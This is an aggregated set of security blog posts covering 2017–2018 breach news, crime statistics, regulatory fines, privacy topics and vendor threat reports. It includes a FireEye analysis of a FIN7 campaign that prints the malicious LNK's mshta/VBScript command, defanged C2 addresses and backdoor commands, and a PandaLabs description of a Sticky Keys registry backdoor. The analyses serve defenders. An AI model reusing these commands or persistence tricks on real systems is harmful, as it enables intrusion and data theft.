We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined amount of more than $676 million last year, up almost 88 per cent compared to 2016. Total cybercrime-related losses totalled $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both of which were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. It will use a key establishment protocol called Simultaneous Authentication of Equals (SAE) which should prevent offline dictionary-based password cracking attempts. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.

 

The post Security newsround: July 2018 appeared first on BH Consulting.

“You have all these silver bullets but not every threat is a werewolf”

Attendees at FutureScope got an insight into how cybersecurity threats have evolved from a technical concern to a business risk. Last week’s business networking conference in Dublin promised perspectives on emerging technologies – including how security affects our increasingly connected world.

BH Consulting founder Brian Honan spoke as part of a panel discussion with Damon Rands, CEO of Wolfberry CS. MC Karlin Lillington, technology columnist with the Irish Times, started by asking: “Are we overly worried or underprepared? Hyped into panic or not taking this seriously enough?”

Brian Honan said: “I think we’re living in an era where we’re reaping the seeds sown over the last few decades.” That partly stems from governments not grasping issues like protecting critical infrastructure, or businesses rapidly releasing products without considering security.

Hype vs hygiene: figuring out security priorities

Hype from security product makers has also played a part, Brian added. “It’s a perfect storm. Any time there’s a new vulnerability announced, it comes with its own website and its own PR campaign. We saw that with Shellshock and Heartbleed, yet in reality, none of our clients were attacked.” Referring to security vendors’ tendency to oversell their products’ capabilities, he said: “You have all these silver bullets, but not every security threat is a werewolf.”

It’s far more common to see organisations with poor security hygiene where they don’t update software patches regularly, or they don’t protect systems properly, Brian said. “For large organisations and most businesses, the risks you face are the standard threats. They include users clicking on links, poor passwords and unpatched systems. When we run security exercises against our clients, the first thing we target is not the IT infrastructure, it’s the people,” said Brian.

Damon Rands agreed. “90% of our work is reconfiguring what [systems] you’ve got already,” he said. At the same time, there are very real threats businesses need to protect against, he added.

Understanding cybersecurity threat types

Those threats vary by the type of businesses, said Brian. “If you’re a small business, the risk is of automated attacks like ransomware or computer viruses; kids and criminals looking for insecure systems. That’s at the base level. As you go up to large organisations with large amounts of data or intellectual property, you become a more targeted threat.”

Addressing the audience, Brian said most businesses shouldn’t think they face the same cybersecurity threats as nation states. “Not everybody in this room is a target for the NSA or GRU,” he said.

Damon Rands said Cyber Essentials is a framework of security controls that can help businesses to check for common risks. However, he pointed out that Cyber Essentials only focuses on technical security controls, not user behaviour and awareness. Growing numbers of businesses have adopted it recently and Rands said: “I believe that’s due to GDPR.”

Another evolution in cybersecurity predates GDPR, Brian added. When he founded BH Consulting in 2004, most of the people he spoke to back in 2004 were in technical roles. “Nowadays, we are being brought in by boards, audit committees and the C-suite who see security as a business risk,” he said.

This prompted Karlin Lillington to ask about how to pitch a technical security message to such a different audience. Brian said: “You have to treat it as another business risk. Very few businesses in the world would be efficient if they didn’t have their IT.”

The post “You have all these silver bullets but not every threat is a werewolf” appeared first on BH Consulting.

Cyber Security Roundup for February 2018

February saw over 5,000 websites infected by cryptocurrency mining malware after a popular accessibility plugin called ‘BrowseAloud’ was compromised by hackers. This led to several UK Government and Councils websites going offline, including the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon Council website. Symantec Researchers also announced that 'Crytojacking' attacks had increased 1,200% in the UK. Cryptojacking once involved the installation of cryptocurrency mining malware on users computers, but now it is more frequently used in-browser, by hacking a website and execute a malicious mining JavaScript as the user visits the compromised website, as with the case with the 'BrowseAloud' incident.

More than 25% of UK Councils are said to have suffered a breach in the last five years according to the privacy group Big Brother Watch, who said UK Councils are unprepared for Cyber Attacks.

There was a  fascinating report released about Artificial Intelligence (AI) Threat, written by 26 leading AI experts, the report forecasts the various malicious usages for AI, including with cybercrime, and manipulation of social media and national news media agendas.

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can attempt to guess the value of various types of stolen data to cybercriminals -.Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates, which saw Microsoft release over 50 patches, and there were new critical security updates by Adobe, Apple, Cisco, Dell, and Drupal.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequence got out of hand when illiterate tribals in a remote Indian district received a Whatsapp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of upto 500 people pounced on strangers who they suspected to the child kidnappers, in all there were two incidents where 7 people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

 As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods

·         Individuals concoct their own stories

·         Marketers release competitive advertisements based on unproven data

·         Groups with vested interests manipulate the volume and narrative of news.

·         Photographs are morphed

·         Old photographs are used to depict recent events

·         Real photographs are used to defame

Obviously, it is also quite easy to catch the perpetrator. A few years back, a twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other type of content that results in incitement or defamation attract stronger penalties and jail terms. Police are more aware and vigilant.
Most cybercitizens unwitting help fake news go viral by recirculating it. It creates a sense of belief that it must be true because the other person must have validated the news before sending it.

Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
Cybercitizens, do take care when crafting messages on social media – a little mischief may provide you a few years in government paid accommodation – Jail. Advise your children to be responsible and do cross check news received over social media before recirculating or believing in it.

What is Data Privacy and why is it an important issue?

The question of whether privacy is a fundamental right is being argued before the honorable Supreme Court of India. It is a topic to which a young India is waking up too. Privacy is often equated with Liberty, and young Indians wants adequate protection to express themselves.

Privacy according to Wikipedia is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There is little contention over the fact that privacy is an essential element of Liberty and the voluntary disclosure of private information is both part of human relationships and a digitized economy.

The reason for debating data privacy is due to the inherent potential for surveillance and disclosure of electronic records which constitute privacy such as sexual orientation, medical records, credit card information, and email.

Disclosure could take place due to wrongful use and distribution of the data such as for marketing, surveillance by governments or outright data theft by cyber criminals. In each case, a cybercitizens right to disclosure specific information to specific companies or people, for a specific purpose is violated.

Citizens in western countries are legally protected through data protection regulation. There are eight principles designed to prevent unauthorized use of personal data by government, organizations and individuals

Lawfulness, Fairness & Transparency
Personal data need to be processed based on the consent given by data subjects. Companies have an obligation to tell data subjects what their personal data will be used for. Data acquired cannot be sold to other entities say marketers.
Purpose limitation
Personal data collected for one purpose should not be used for a different purpose. If data was collected to deliver an insurance service, it cannot be used to market a different product.
Data minimization
Organizations should restrict collection of personal data to only those attributes needed to achieve the purpose for which consent from the data subject has been received.
Accuracy
Data has to be collected, processed and used in a manner which ensures that it is accurate. A data subject has to right to inspect and even alter the data.
Storage limitation
Personal data should be collected for a specific purpose and not be retained for longer than necessary in relation to this purposes.
Integrity and confidentiality
Organizations that collect this data are responsible for its security against data thefts and data entry/processing errors that may alter the integrity of data.
Accountability
Organizations are accountable for the data in their possession
Cross Border Personal information
Requirements.
Personal information must be processed and stored  in secured environment which must be ensured if the data is processed outside the border of the country

It is important for cybercitizens to understand their privacy rights particularly in context of information that can be misused for financial gain or to cause reputational damage.




The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report

q1 headline image - blog

Developments in Cyber-crime, Cyberwarfare and AI mark the first quarter of 2017, as indicated by PandaLabs Q1 Report. The Report by Panda Security’s malware resource facility identifies prominent tactics, attack methods and shifts in the industry.

The Cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and organisations like Vdos, an organisation specialising in DDos attacks, indicate the professionalism of the cyber-crime industry. In Q1 we continue to see new and adapted attack methods such as RDPatcher, malware detected by PandaLabs in its attempt to access the victim’s endpoint and prepare it for rental on the Dark Web.

Politically motivated cyber-attacks

Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, Cyberwarfare has become a popular tactic in enforcing political agendas. In Q4 of 2016, we saw some of the first high profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity the development is clear as countries like Germany have now begun to develop cyber-command centres to monitor online activity – this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a Smart TV using only a DDT signal.

A perfect device for eavesdropping

Recent developments in Robotics and AI have led to that belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs – introducing virtual assistants like Google Home and Amazon Echo, can become a dangerous in road for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on – making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence that could be useful to their case.

Over the course of 2016 Ransomware attacks earned criminals billions of Rand. Fueled by its profitability, Ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered Ransomware variant WYSEWYE -that allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give back control to the victim.

See the full report by PandaLabs here.

The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Hackers Spark Revival of Sticky Keys Attacks

password

Hackers are constantly trying to find new ways to bypass cyber-security efforts, sometimes turning to older, almost forgotten methods to gain access to valuable data. Researchers at PandaLabs, Panda Security’s anti-malware research facility, recently detected a targeted attack which did not use malware, but rather used scripts and other tools associated with the operating system itself in order to bypass scanners.

Using an attack method that has gained popularity recently, the hacker launch a brute-force attack against the server with the Remote Desktop Protocol (RDP) enabled. Once they have access to the log-in credentials of a device, the intruders gain complete access to it.
At this stage, the attackers run the seethe.exe file with the parameter 211 from the computers’ Command Prompt window (CMD) – turning on the ‘Sticky Keys’ feature.

1-1

Next, the hacker initiates Traffic Spirit – a traffic generator application that ensure the attack is lucrative for the cyber-criminals.

2

Once this is complete, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:
• registery.reg
• SCracker.bat
• sys.bat

The hacker then runs the Windows registry editor (Regedit.exe) to add the following key contained in the registery.reg file:

3

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat is run. This is a batch file that implements a very simple authentication system. Running the file displays the following window:

4

The user name and password are obtained from two variables included in the sys.bat file:

5

This creates a backdoor into the device through which the hacker gains access. Using the backdoor, the hacker is able to connect to the targeted computer without having to enter the login credentials, enable the Sticky Keys feature, or enter the relevant user name and password to open a command shell:

6

The command shell shortcuts allow the hacker to access certain directories, change the console colour, and make use of other typical command-line actions.

7

The attack doesn’t stop there. In their attempt to capitalise on the attack, a Bitcoin miner is installed, to take advantage of every compromised computer. This software aims to use the victims’ computer resources to generate the virtual currency without them realising it.
Even if the victim realises their device has been breached and changes their credentials – the hacker is still able to gain access to the system. To enable Sticky Keys, the hacker enter the SHIFT key five times, allowing the cyber-criminal to activate the backdoor one again.

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organisation from serious financial and reputational harm. Business leaders need to recognise the need for advanced security, such as AD360, to protect their network from these kinds of attacks.

The post Hackers Spark Revival of Sticky Keys Attacks appeared first on CyberSafety.co.za.

Cyber Security Predictions for 2017

Pandalabs-summer16

Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016

art-blog


Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

